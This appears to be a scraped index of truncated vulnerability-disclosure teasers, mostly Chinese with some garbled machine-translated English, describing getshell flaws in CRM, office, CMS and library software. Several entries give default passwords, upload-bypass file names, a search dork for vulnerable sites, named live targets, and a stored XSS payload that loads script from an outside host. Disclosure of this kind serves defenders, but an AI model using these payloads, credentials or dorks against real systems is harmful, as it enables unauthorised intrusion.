某通用CRM系统任意文件上传

简要描述： 某通用CRM系统任意文件上传 详细说明： 用友旗下的畅捷通CRM http://www.chanjet.com/bencandy.php?fid=41&id=185 如图 存在任意文件上传，我们到官方demo站，crm.chanjet.com,发现弱口令 test 111111，成功登入 选择产品，看到附件 我们来新建一个附件，直接上传1.php，上传成功，我们来访问下， 上传后缀成了php.bak，由于官方使用apache搭建的，存在解析漏洞，所以这个是可以get...

某图书管理系统存在默认口令导致getshell

简要描述： 图书管理系统自带tomcat存在默认管理员口令，可以直接getshell，影响大量图书管理馆 详细说明： 自带tomcat系统存在默认管理员账号： 可以登录tomcat，直接上传webshell 漏洞证明： intitle:博云非书资料管理系统 inurl:poweb 可以发现大量图书馆使用了该系统，都可以登录tomcat后台，上传webshell：...

用友协作办公平台getshell(特奇葩且通杀)

简要描述： 用友协作办公平台getshell特奇葩且通杀 详细说明： 重复： WooYun: 用友某办公平台通用漏洞getshell漫游内网第一弹 1 漏洞文件 /common/uploadFile.jsp 查看源文件,如图 重点关注这里 "?action=save&savePath=/imageshttps://images.seebug.org/upload/&fileName=14051439450001.jpg" 看见了什么?没错！保存文件的路径 文件名全在这里,是不是觉得特奇葩.. 2 漏洞测试 随便上传一个文件,同时 F12...

用友某系统Getshell+用户敏感信息泄露

简要描述： 用友某系统多处Getshell+用户敏感信息泄露 详细说明： 1 漏洞代码 /5107https://images.seebug.org/upload/upload.php /5107https://images.seebug.org/upload/screenImagesSave.php None 上传文件jpg格式的网马文件，上传 即可在/data/files/日期/下生成1.php.a;.7z 3 连接木马文件 http://icc.hnair.com/data/files/20140416/1.php.a%3B.7z 漏洞证明： 4 用户敏感信息泄露...

mcms后台csrf加管理+2种后台getshell方式

简要描述： mcms手机建站之星，审的差不多了，最后发一个吧。还有些代码中间有些地方有点危险，但暂时没发现能造成什么漏洞。 加之前那个后台getshell方法，一共三弹，都不一样，有不同的新姿势。 详细说明： mcms后台没有验证token，所以可以导致csrf（不过前提是，要有后台地址）。除了可以直接getshell以外，还可以加个管理账户，手动getshell，这样更保险。 csrf加管理的javascript代码如下： gum = function var u = 'version':'1140213', 'domain':'domain', 'backinfo':,...

开源轻论坛StartBBS后台任意文件删除+getshell（需要管理员权限）

简要描述： 找了好半天，感觉没太好的后台getshell的方法。 分析我以前交的一个前台getshell漏洞（http://wooyun.org/bugs/wooyun-2013-045143），就是通过重装来getshell的（最新版本v1.1.5任意重装的洞已经修了，但重装的位置依旧可以getshell），那么如果有一个任意文件删除洞的话，岂不就能删除.lock文件，来重新安装了呢？来getshell了呢？ 我之前也一直用CI做开发，常参考startbbs的源码，在这里说声谢谢 详细说明： 后台代码app/controllers/admin/dbadmin.php 75行 publi...

mcms可CSRF后台getshell

简要描述： mcms后台某功能getshell，再加上后台没有验证token，所以可以通过csrf直接拿shell 详细说明： 先说说后台getshell吧。 后台文件auth.php是设置授权码的地方，我们看其中有一个函数： function msetauth checklevel"A0501"; $config ='../core/config.php'; $cf = filegetcontents$config; $code = isset$POST'auth' && !empty$POST'auth'?$POST'auth':''; if AUTHCODE !=...

大汉版通所属部分系统文件任意文件上传漏洞

简要描述： 任意类型文件上传，可getshell。影响到jact、jsearch、JCMS相关版本，不好一一统计。 详细说明： 受影响的系统版本是WebService中存在一个receivefile操作的，一般在wsInfo服务中。 （注：不同产品不同版本代码可能会有所不同） 0x1 jsearch public String receivefileString strLoginId, String strPwd, String strKey, DataHandler handler, String filename, int iState String result = "";...

74CMS存储型XSS跨进后台可GetShell

简要描述： 详细说明： 1、先来看存储型XSS跨进后台 在申请链接处，文件/link/addlink.php elseif $act=="save" $captcha=getcache'captcha'; $postcaptcha = trim$POST'postcaptcha'; if$captcha'verifylink'=='1' && empty$postcaptcha showmsg"请填写验证码",1; if $captcha'verifylink'=='1' && strcasecmp$SESSION'imageCaptchacontent',$postcaptcha!=0...

某通用校园管理系统绕过限制getshell（需登录）

简要描述： 某通用校园管理系统绕过限制getshell 详细说明： 接着上次的漏洞来getshell------某通用校园管理系统权限不严格 http://www.wooyun.org/bugs/wooyun-2014-059827/ http://www.fjzhyz.cn/ws2004 用上次的漏洞来获取炒鸡管理员账号登录。 系统管理----资源下载---资源设置 http://www.fjzhyz.cn/ws2004/sysmanage/Resource/resset/default.asp 随便找个分类，修改为如下的设置。我修改的是—优秀课件分类...

Easytalk垂直权限问题（逻辑漏洞可提权getshell）

简要描述： Easytalk处理用户数据的时候未足够过滤，导致可以进行权限提升 详细说明： 晚上习惯性的打开代码分析分析函数，看到了这样一处 漏洞文件: /Easytalk/Home/Lib/Action/GuideAction.class.php //保存设置,注册用户时候，向导保存设置 public function doset $user=M'Users'; $userdata=$POST"user";//获取用户提交的所有数据 // ok，此处的用户userdata数据是来自post的，而并未过滤一些敏感字段 $userdata"nickname"=...

dede getshell exp + temporary patch-vulnerability warning-the black bar safety net

dede good fire old cassock also to scrape together a lively. In fact getshell many methods do not always tangled how to insert mytag table such as near myad table is a good place to update a word did not say more not much to say directly to the getshell exp. getshell exp To change the password wh...

EasyTalk任意文件删除漏洞(可后台getshell)

简要描述： Code AuditEasyTalk任意文件删除漏洞【可重装，并可后台getshell】 详细说明： 漏洞代码文件:/easytalk/Home/Lib/Action/settingAction.class.php文件 代码: //保存头像 public function doface $ysw=$POST'ysw'; if $ysw660 $zoom=intval$ysw/660; else $zoom=1; $x=$POST'x'$zoom; $y=$POST'y'$zoom; $w=$POST'w'$zoom; $h=$POST'h'$zoom;...

PHPOK#XSS利用突破到GetShell第一发

简要描述： 数据库对存入进行过滤，但是取出来的时候，仍然可利用XSS完成GetShell. 详细说明： 在线留言功能里面留言主题在存入数据的时候都进行了过滤 数据库内容 数据库的字段长度为255，可以写任何的数据进去操作了 如: ';var s=document.createElement'script';s.src='http://xssi.pw/fPJgOU';document.body.appendChilds;' 另外： ';loadjs'http://xssi.pw/fPJgOU';' loadjs这个在自己加载的JS里面admin.php?c=js，内容： var...

kppw威客系统上传文件漏洞导致GetShell

简要描述： 文件类型过滤不严，可以绕过上传 详细说明： 漏洞代码： /lib/helper/kekefileclass.php 138158行 None 2.shell前面加上Ra Ra 3.上传shell...

建站之星Sitestar前台Getshell一枚

简要描述： 看sitestar 在某数字公司还是属于一般应用的, 就准备提数字了。 太坑了 然后果断拒绝提交详情。 还是提到乌云来把。 不知道sitestar在乌云是不是属于一般应用的? 狗哥给个回应哈。 Sitestar 前台Getshell。 无需登录。 详细说明： 在官方论坛上下的最新版 在 install/index.php中 define'INCONTEXT', 1; includeonce'load.php'; ? 包含进来 那再继续看看。 $lockfile = ROOT.'/install.lock'; $patterndb = '/0-9a-zA-Z$/';...

The establishment of the station star(sitestar)is the latest version of the background GETSHELL-a vulnerability warning-the black bar safety net

Editor selected upload feel free to upload a picture of the Trojan, select the picture space. ! 111725333fea4f533785ba0b7e7a7689bc91402b 2013121109221924293. jpg I just uploaded the Trojan. Double-click the name. Found the back of the. jpg is not modified. Open the browser of the review element...

PHPMYWIND 后台Getshell的一种方法

简要描述： 过滤不严。 详细说明： phpmywind 和 dedecms 都挺像的。 在修改配置文件的时候 过滤掉了单引号 防止闭合单引号 Getshell。 $cfgwebname = '我的网站'; $cfgweburl = 'http://127.0.0.1'; $cfgwebpath = '/phpmywind'; $cfgauthor = ''; $cfggenerator = 'PHPMyWind CMS'; $cfgkeyword = ''; $cfgdescription = ''; 配置文件 单引号保护。 然后过滤掉单引号。 看似无法从配置文件这里下手 其实还是可以的...

深澜软件鸡肋漏洞可被getshell

简要描述： 深澜软件鸡肋漏洞造成getshell 详细说明： 有好几个鸡肋漏洞，就造成了getshell。 本例以中枪的陕西科技大学为例。 1.爆路径问题http://xxxx.xx:8080/global.php，所有均存在路径泄露 不过实际路径是/srun3/srun/services/ （1）80端口路径/srun3/web/ （2）8800端口路径/srun3/srun/services/ （3）8080/8081端口路径/srun3/srun/web/ 2.管理后台（8080/8081端口），默认口令 support...

E-Commerce system ShopNC multiple vulnerabilities(may be violence getshell)-vulnerability warning-the black bar safety net

Introduction ShopNC is a S is to network city create want to the company's service to business customers in the e-Commerce system, based on PHP5 technology uses the MVC pattern development, this article describes shopnc multiple vulnerabilities combined,can be getshell a little violent-- Any file...